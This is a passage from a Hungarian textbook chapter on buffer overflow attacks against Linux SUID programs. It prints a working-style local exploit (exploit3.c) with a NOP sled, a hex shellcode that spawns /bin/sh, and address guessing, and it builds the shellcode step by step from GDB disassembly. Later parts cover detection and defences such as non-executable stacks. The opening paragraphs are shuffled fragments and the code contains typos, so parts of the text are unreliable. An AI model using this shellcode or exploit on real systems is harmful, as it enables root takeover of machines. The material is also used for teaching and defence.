különben nem fog menni. amely már nem ehhez a pufferhez. A ping egy jó példa az olyan programra. Sok. például az 1024 alatti portoké vagy eszközöké. hogy miért kell egyáltalán root-jogokkal futniuk a programoknak. akkor csak annyit kell tennie. Eközben az adatok mindent felülírnak.2 Hogyan működik? Shell-kód alatt olyan assembler-kódot értünk. amelyek a roothoz tartoznak.adatmennyiség kilóg a pufferből egy olyan területre. a tulajdonképpeni Buffer-Overflow-t. és végül a program hibás működését. Forráskódokkal mutatjuk meg. és egy hosszú karakterláncot küld egy meghatározott programnak. Ha a támadó kapcsolatot épít fel a hosttal. amely arra kényszeríti a programot. hogy egy shellt (parancssort) nyissanak root-jogokkal a rendszeren. Világos. amelyek arra valók. mint a raw sockets vagy bizonyos rendszererőforrások elérése. amikor a program egy eljárásból vagy függvényből visszatér. hogy a program a tulajdonos és nem a felhasználó jogaival fut. Ez természetesen hibákat eredményez. ami root-jogokkal fut. A továbbiak megértéséhez alapos assembler.2. string). Talán felmerül a kérdés. amely A-kkal tölti ki a memóriaterületet for(i = 0. Ezzel át lehet venni az ellenőrzést a számítógép felett.és Shellscript-ismeretekre van szükség . az lefagy. hogy ez fusson a főprogram helyett. Ha minden felhasználó root-jogokkal tud programokat futtatni. Itt a támadók különösen abban érdekeltek. hogy egy ilyen program biztonsági kockázatot jelenthet. hogy egy shellt hozzon létre. úgynevezett kizsákmányoló (exploit) kód van. A biztos eredmény: memóriavédelmi hiba és a program összeomlása. } 11. Azonban bizonyos bevitelekkel még végre lehet hajtatni egy kódot az instabil rendszeren. mint a ToGreat változó. amíg az megtelik. de minden felhasználó elindíthatja. hogy egy Buffer-Overflow segítségével „megörököljenek" egy root-jogokkal rendelkező shellt. i++) { large_string[i] = 'A'.2. hanem más változókhoz tartozik. csak hogy megszerezzék a nekik szükséges helyet. root-jogokat követel meg. A kivitelezéshez szükséges programok (GCC=GNU C Compiler. és . Egy példa az ilyen kódra: voidman( ) { //a ToGreat változót 256 bájttal inicializálja char ToGreat[256] //ciklusváltozó int i. amit átadtak charTolittle[16] //megpróbálja 256 bájttal teleírni a puffért. A shell-kód értelme és célja. holott csak 16 bájtra volna lehetőség. Ez egy SUID bitet helyez el. természetesen megnő a lehetséges hibaforrások száma. GDB=GNU Debugger) futtatásához még Linux is kell. . Ez főleg a SUID-programoknál érdekes. amely a tulajdonképpeni hibát okozza void Overflow(char *string) { //A puffer kisebb. amelyek már bootoláskor elindulnak. hogy addig ír a pufferba. //egy ciklus. ami azt jelenti. amit ott találnak. Ennek a következő a háttere: egyes funkciók. hiszen rootként futó eljárások csak olyanok lehetnek. //ezért az utána elhelyezkedő terület felülíródik strcpy(ToLittle. OverFlow (To Great) } //Most jön a függvény. végül rátesz még egy lapáttal. i < 255. 11. s hogyan lehet célzottan megváltoztatni a függvény visszatérési pontjának a címét.1 Hogyan lehet ezt kihasználni? Ha a támadó Buffer-Overflow-val akar lefagyasztani egy programot. hogyan nem íródnak felül válogatás nélküli tetszőleges programrészek.

hogy növeljék a találat esélyeit. mint a „DEFAULT_OFFSET". Ez a kód még nincs kész. cbar shettcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\ x40\xcd" "\x80\xe8\xdc\xff\xff\xff\bin/sh". } memcpy(buff. if (!(buff=malloc(bsize))) { printf("Can't allocate memory.4). hogy a NOP-kód csak a Ox90-es Intel CPU-kon fut. addr. ptr = buff+ ((bsize/2) . i++) buff[i] = NOP. if (argc > 2) offset = atoi(argv[2]). a többi assembler. Pointer a ptr címére for (i = 0. for(i = 0.offset. i+=4) *(addr_ptr++) = addr. Az „Offset" értéke 0 0 512 0x90 printf("Using address: 0x%x\n". ptr = buff. A Shellcode változóhoz egy értéket rendelünk.1000 NOP kód. \n"). hogy kevesebb számot használunk. i < bsize/2. system("/bin/bash "). int i. Pointer az „addr-ptr" helyére. olvashatóbbá váljon. i < strlen(shellcode). *ptr. azáltal. . A NOP-kódokat a pufferméret feléig írjuk a memóriába. long *addr:ptr. Kiírja a „Using address: 0x%x\n" -t és az „addr" értékét. Ezért nagyon pontosan meg kell becsülni. addr).Magyarázatképpen egy forráskód: exploit3. a Shellcode csak a „bin/sh". for (i = 0. hogy a kód."EGG=". mert az addr-ptr címét minden cikluslefutással növeljük. buff[bsize -1]= '\0'. exit(0). a pointer minden alkalommal egy bájttal tovább mutat. i++) *(ptr++) = shellcode[i]. hogy eltaláljuk a megfelelőt. Egy valódi exploitnál ez többnyire több mint 100 . bsize=DEFAULT_BUFFER_SIZE. Beírjuk a shellkódokat a memóriába.c #include #define DEFAULT_OFFSET #DEFAULT_BUFFER_SIZE #defineNOP addr = get_sp( ) . putenv(buff). A „ptr" megfelel a „bufF"-nak addr_ptr = (long *) ptr. mert még nem ismerjük a shellkód helyét a memóriában. unsigned long get_sp(void) { asm("movl%esp. Fontos még megemlíteni.(strlen(shellcode)/2)). int offset=DEFAULT_OFFSET. Természetesen a támadók több NOP-kódot is beépítenek. A változókhoz értéket rendel if (argc > 1) bsize = atoi(argv[1]). Most elhelyezzük az endbyte-ot. i < bsize. dhar *argv[ ]) { char *buff. } A „get_sp" változó feltöltése assembler-kóddal} mid main(int argc. } Olyan fogalmakkal lehet dolgozni.%eax").

(gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+l>: movl %esp.%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp). %esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump. elindítjuk. %ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb. A parancs így néz ki: gcc -o shellcode -ggdb -static shellcode.%esp 0x8000158: popl %ebp 0x8000159: ret End of assembler dump. és egy új frame-pointert állítunk elő.%edx 0x80002d2 <__execve+22>: movl %edx.%ebp $0x8.%eax 0x800014d: pushl %eax 0x800014e: call 0x8002bc <__execve> 0x8000153: addl $0xc. először a „main"-t analizáljuk: 0x8000130: 0x8000131: 0x8000133: pushl movl subl %ebp %esp.%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax. Ehhez először a GCC-vel kell compilerelni a programot. name[1] = NULL. } Hogy megnézzük.c Most elindítjuk a GDB-t: gdb shellcode A GDB ingyenes szoftver. és másolatot is lehet róla készíteni! (gdb) disassemble main Dump of assembler code for function main: 0x8000130: pushl %ebp 0x8000131: movl %esp. A régi frame-pointert mentjük.2. Hogy ezt megértsük.%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp). hogyan néz ki a forráskód assemblerben.%eax 0x8000149: pushl %eax 0x800014a: movl 0xfffffff8(%ebp).%ebp 0x8000133: subl $0x8.%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp. NLL).3 Minek kell a Shellcode változónál állnia? Most már mindenképpen segítségül kell hívni egy GDB-t! shellcode. execve(name[0].%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp).%esp 0x8000156: movl %ebp.%esp Ez volt az eljárás kezdete.(%eax) 0x80002e1 <__execve+37>: movl $0xfffffffc.11. Ebben az esetben: . name.0xfffffff(%ebp) 0x800013d: movl $0x0. name[0] = "/bin/sh".%esp 0x8000136: movl $0x80027b8.%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <_execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x80001a34<__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx. amely szabad helyet készít a helyi változóknak.c #include void main( ) { char *name[2].0xfffffffc(%ebp) 0x8000144: pushl $0x0 0x8000146 leal 0xfffffff8(%ebp). és GDB-vel elemezzük.

Kernel módra váltunk./bin/sh" címe) bemásoljuk az első pointer of name[ ] -be. Ez ugyanazt jelenti mint: name[0]="/bin/sh". 0x8000149: 0x800014a: 0x800014d: 0x800014e: pushl call pushl %eax 0xfffffff8(%ebp). 0x8000146: leal 0xfffffff8(%ebp).%ecx 0x10(%ebp). Ezt úgy tudja elérni.. A támadó egy ilyen programot természetesen megpróbál tisztán programozni.%eax 0x8(%ebp). hogy hozzáfűz egy exit syscall-t: exit. ha félresikerül? A program végeérhetetlenül tovább hozná az értékeket a stackből.%eax Betöltjük a name[ ] címét az EAX regiszterbe.0xfffffff(%ebp) 0x80002c0 <__execve+4>: movl 0x80002c5 <__execve+9>: movl 0x80002c8 <__execve+12>: movl 0x80002cb <__execve+15>: movl 0x80002ce <__execve+18>: int $0xb.c #include void main( ) { exit(0). %ebp pushl %ebx . } gcc -o exit -static exit. Nem valami finom dolog. 11 az execve. A "/bin/sh" címét bemásoljuk az EBX-be. Minden folyamat az operációs rendszertől függ. Most execve( ). %eax 0x8002bc <__execve> Beírjuk a stackbe a "/bin/sh" sztring címét. 0x8000136: Az eljárás kezdete movl $0x80027b8.%eax Beírjuk a name[ ] címét a stackbe. 0x80002bc <__execve>: 0x80002bd <__execve+1>: movl 0x80002bf <__execve+3>: pushl %ebp %esp. Az execve( ) meghívása itt kezdődik. amelyek azután más értékeket tartalmazhatnának. 0x8000144: pushl $0x0 Az execve( ) argumentumait fordított sorrendben helyezzük (push) a stackbe. Ez ugyanazt jelenti mint: name[1] = NULL. (gdb) disassemble_exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp.%edx $0x80 A 0xb-t a stackbe másoljuk. Az execve( ) library eljárás meghívása. movl Betöltjük a "/bin/sh" sztring címét az EAX regiszterbe.. Beírja az instruction pointert a stackbe.%ebp A 0x80027b8 értéket (a . 0x800013d: movl $0x0.c gdb exit (no debugging symbols found). Tulajdonképpen ez minden az execve( ) meghívásáról. A name [ ] címét bemásoljuk az ECX-be.%ebx 0xc(%ebp). NULL-ával kezdünk.char *name[2]. Ez az index a syscall-táblában. A Null pointer címét az EDX-be másoljuk. De mi történik.0xfffffffc(%ebp) A 0x0 (NULL) értéket a második pointer of name[ ] -be másoljuk.

%eax movl %esi. könnyítésképpen bizonyos parancsokat lehet használni. amelyekkel relatív címeket kapunk.%ebx int $0+80 movl 0xfffffffc(%ebp).0x800034f <_exit+3>: 0x8000350 <_exit+4>: 0x8000355 <_exit+9>: 0x8000358 <_exit+12>: 0x800035a <_exit+14>: 0x800035d <_exit+ll>: 0x800035f <_exit+19>: 0x8000360 <_exit+20>: 0x8000361 <_exit+21>: 0x8000362 <_exit+22>: 0x8000363 <_exit+23>: End of assembler dump.%ebx movl %ebp. és a C a Call helyett áll.nullbyteoffset(%esi) movl $0x0. Összefűzve ez a következőképpen néz ki: Elhelyezzük a sztringet a kód mögött. Mivel soha nem tudjuk pontosan. A programfutás a következőképpen néz ki: Az Exit syscall-t a 0xl-re helyezzük az EAX-ben. movl string_addr.array-offset(%esi) # movb $0x0. Ha a „/bin/sh" sztring elé egy Call parancsot teA programkód a módosításokat követően jmp offset-to-call popl %esi . hogy a visszatérési címet bemásoljuk a regiszterbe. %edx int $0x80 movl $0x1. (%esi). Jump-pal és Call-lal olyan parancsokat lehet használni. ez az exit kód.null_addr movl $0xb. # 2 bytes # 1 byte 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes . pushl %ebx movl $01.null_byte_addr movl $0x0. mikor a hívás lefutott. %ebx int $0x80 call offset-to-popl /bin/sh string goes here. és ezután kell végrehajtani az „int 0x80"-at. %ebx leal array-offset. %ebx int $0x80 /bin/sh string goes here. %eax movl string_addr. %eax movl $0x0. %esp popl %ebp ret nop nop nop szünk. movl %esÍ. %ebx leal string_addr.string_addr_addr movb $0x0. hogy pontosan hova kerül a memóriában az exploit kódunk. %ecx leal null-offiet(%esi). Most már csak annyit kell tenni. ha nem volt hiba.%edx int $0x80 movl $0x1. természetesen a sztring címét és az endbyte nullát a tömb mögé tesszük.%ecx leal null_string. és a Call parancshoz egy Jump parancsot. %eax movl $0x0. A J itt a Jump. A legtöbb program 0-t ad vissza.%eax movl 0x8(%ebp). a sztringcím lesz visszatérési címként megadva.null-offset(%esi) movl $0xb.

és ismét a GDB-t használni. Ha egy bevitel ellenőrzés nélkül. és máris jelentkeznek ezek a problémák.%ecx leal 0xc(%esi). íme. hogy soha nem statikus puffereket. Lényegében a dinamikus hozzárendelés sem sokkal biztonságosabb. de nem a Heap-based Overflow-któl. mekkora a rendelkezésre . egy ciklus. hogy túl lehet tölteni a puffért. Ha ez kész. először a compilerrel lefordítjuk. a kódot egy globális tömbbe helyezzük a fájlszegmensben. A sztring azonban lehet túl hosszú. Ha olyan programról van szó. Mik azok a Heap-based Overflow-k? Heap-based Overflow-kat sokkal nehezebb előállítani. az ismert bizonytalansági faktorokra. ami pl. mint a Stack Overflow-kat. %ebx leal 0x8(%esi). közvetlenül a Strcpy-val kerül használatba.0xc(%esi) movl $0xb.%eax movl %esi. 11. egy kis példa: void tulcsordul(char argvFG) { char BuffertoLittle [4]. a strcpy( ) és a scanf( ) nem figyelnek arra. %ebx int $0x80 call 0x2b string \"/bin/sh\" # 2 bytes # l byte # 3 bytes # 4 bytes # l bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes #8 bytes álló puffer. Hogy ezt elérjük. A másik eljárás arra. a gets( ). Az ilyen funkciókat a forráskódban a legegyszerűbb megkeresni. és azután teszteljük. és a \0 jóval a puffer vége után is elhelyezkedhet. a user interfészen keresztül lehet váratlan bevitelekkel tesztelni a programot. Ha nincs ilyen lehetőség (nincs meg a forráskód). amely elolvas és a pufferbe ír egyes karaktereket. logikus. A programozók úgy gondolják. és hibákat keresünk. A hiba azonban többnyire nem a programozón múlik. 11. ezért ritkábban is találkozni az előbbiekkel.%edx int $0x80 movl $0x1. a vprintf( ). ezt kapjuk: jmp 0x26 popl %esi jnovl %esi. működik-e a kód. amelynek megvan a forráskódja. és ezután a transzferkontrollt kell használni. amelyet futtatunk. ezzel minden veszélytől védve vannak. Ezért a kódot.3 Áldozat a Buffer-Overflow-kért Ezekhez a támadásokhoz tehát egy pufferra van szükség. A könyvtárfüggvények tartalmazta parancsok.4 Honnan lehet felismerni a Buffer-Overflow-t? Szerencsére sok lehetőség van a Buffer-Overflow-k felismerésére. Ez persze véd a Stack Overflow-któl. Hogy kiderüljön. %eax movl $0x0. akkor lehet mindent compilerelni. akkor nincs gond. hogy egy puffért bevitelekkel megtöltsünk. Hozzáértő hackereknek tehát ez egy egészen különleges támadási pont! A gond az. Itt szisztematikusan ellenőrizni kell a paraméter-átadásokat és az egyes funkciókat (a DLL-eket és a library-ket). egy fájlszegmensbe vagy stackbe kell csomagolni. ami természetesen egy fatális programozási hiba. amelyhez a vége után is hozzá tudunk írni. egy null-terminálással megjelölt program végéig.0x7 (%esi) movl $0x0. Linuxprogramoknál szabadon hozzáférhető.Ha az offseteket Jump-ról Call-ra. Sok operációs rendszer ezt megint csak nem engedi meg. Ilyenkor többnyire a sztringhosszúságot figyeljük az átadási pontokon. hogy mi áll hozzá a rendelkezésünkre. s a programozók sem nagyon védik ettől a programjaikat.0x8(%esi) movb $0x0. Call-ról Popl-ra. A parancsok egyszerűen egy null-karakterig (\0) olvasnak. neki elég néhány könyvtárfunkciót használnia. a strcat( ). Először azonban a bináris kód hexmegjelenítéséhez kell jutnunk. De van egy probléma! Ez a kód sajátosan változik. ami attól függ. hanem helyette malloc( ) -ot használnak. a sztringcímről tömbre és a sztringcímet nullára számoljuk át. a sprintf( ).

6+ védenek. Ha ez megtörténik. illetve védhetnek bizonyos mértékig e támadások ellen. Különösen. strcpy(BuffertoLittel. A névadási kényszer miatt ez a variáció szinte mindig sikeres. Megmutatja. Ezt indítja el az exploiton keresztül is. A Solaris 2. mert a beírás hosszabb volt. mint azt a programozó várta. argv). először ellenőrizni. Ezért érvényes a régi szabály: „Minél jobban eltérsz a szabványosított megnevezésektől. pl. /*Rossz: Ha argc[ ] túl nagy. és egy speciális compilerrel minden programot újra kell fordítani. } /* Helyes: ahogy a felső részben. noexec_user_heap). hogy a „heap"-ben és a „stack"-ben programok futhassanak (noexec_user_stack. strcpy(BuffertoLittle. a támadó többé nem tud mit kezdeni ezzel a számítógéppel. hanem egy manuálisan előidézett BufferOverflow demonstrálása. „PZK" túlfut */ } int main(int argc. a „root"-ot lehet egyszerűen így nevezni: „HAHA". vagy váratlan karakterekkel feltölteni. bevitelekkel tesztelni a Buffer-Overflow lehetőségeket. Itt az átadandó paraméternek olyan a hossza. disassemblálni. a SecureLINUX és a Solaris 2." A demonstráláshoz egyszerűen le kellene fordítani ezt a programot. Így már a hálózat felügyeletével is fel lehet ismerni. char *argv[ ]) { cout« "Az átadandó paraméter hossza:" « strlen (argvF1G) « "\n". honnan jönnek az adatok. nincsenek veszélyben. annál nehezebb lesz a támadás. Ha egy kifelé nyitott hálózati szolgáltatóról van szó. és az egész Linuxot kompletten át lehet írni. hogy egy rootshell-hez jusson egy másik Linux-gépen.if (strlen(argv) > 7) { cout« "Rossz: a puffer túl fog csordulni\n". A SecureLINUX-nál egy patch-re van szükség ehhez. A standard kernelt kell megváltoztatni. mielőtt a hacker törölhetné a nyomait a logfájlokból. hogyan lehet paraméterekkel és más átadásokkal (ezek más helyeken is történhetnek) szándékosan lefagyasztani programokat. Egy programot lehet pl. úgy kell ezt */ /* csinálni. Honnan ismerünk fel egy Buffer-Overflow-támadást? A Buffer-Overflow-támadásokat nagyon nehéz felfedezni. argv). vagyis manuálisan. akkor a Netcattel egyenként lehet ellenőrizni a parancsokat a Buffer-Overflow-ra. hogy a shellneveket és az /etc/passwd-fájlt megfelelően megváltoztassuk. } 11. Itt nem a forráskód a fontos.5 Milyen védelmi mechanizmusok vannak? Tulajdonképpen csak egy Linux-verzió. és a következőképpen elindítani: „Név 052698541". A felderítés egyik lehetősége lenne a szerver lekapcsolása.6+ nál a „normál" telepítés után aktiválni lehet egy kapcsolót. itt is szándékosan túl hosszú beviteleket kell csinálni. De felhasználóként vagy rendszergazdaként megvan még az a lehetőségünk is. } eke { cout « "Bevitel OK. ami megakadályozza. és utána végrehajtani vagy */ /* mindjárt biztonságos függvényeket használni */ Természetesen más módszerek is vannak. ha a felhasználói privilégiumokat nem használják ki túlságosan. Ahogy az előbbiekben. tulcsordul(argv[1]). hajtsd végre\n". A hacker célja mindig az. és a reakcióra várni. ha egyszer már megleptek. ha minden program forráskódja megvan. Ezáltal a Solarissal kapott programok. hogy az összedöntí a programot. és részletről részletre átvizsgálni. amelynél a parancsokat és a szintaxist is meg lehet tudni. Így a fenti példa szerinti Buffer-Overflow természetesen nem sikerülhet. . Ez akkor segíthet.

nem fognak bennük kiindulási pontot találni Buffer-Overflow-khoz.1 Összefüggés a CPU és a Buffer-Overflow között Manapság sok szervert működtetnek a kereskedelemben nem szokásos CPU-kkal. A tűzfal megnehezíti a külső.5. 11. . proxy. Ezáltal a támadót vissza lehet fordítani az assembler-kód irányába. Így a tapasztalatlan támadóknak aligha van esélyük. hogy egy készre fordított exploit jelenik meg az interneten.2 A Buffer-Overflow-k és a tűzfalak Egy tűzfallal természetesen csökkenteni lehet a Buffer-Overfíowtámadások lehetőségét. pl. e-mail gateway. Konfliktusok abból adódhatnak. és csökken annak a kockázata.5. HTTP-szerver vagy adatbázis szerverként működik.11. ha a szervernek még más feladatokat is el kell látnia. router. Mivel a tűzfalak szinte mindig viszonylag kicsik. Teljes biztonságban azonban sohasem érezhetjük magunkat. Ezek nagy biztonsági kockázatot jelentenek. illetve a belső interfészek megtámadását.

Sign up to vote on this title
UsefulNot useful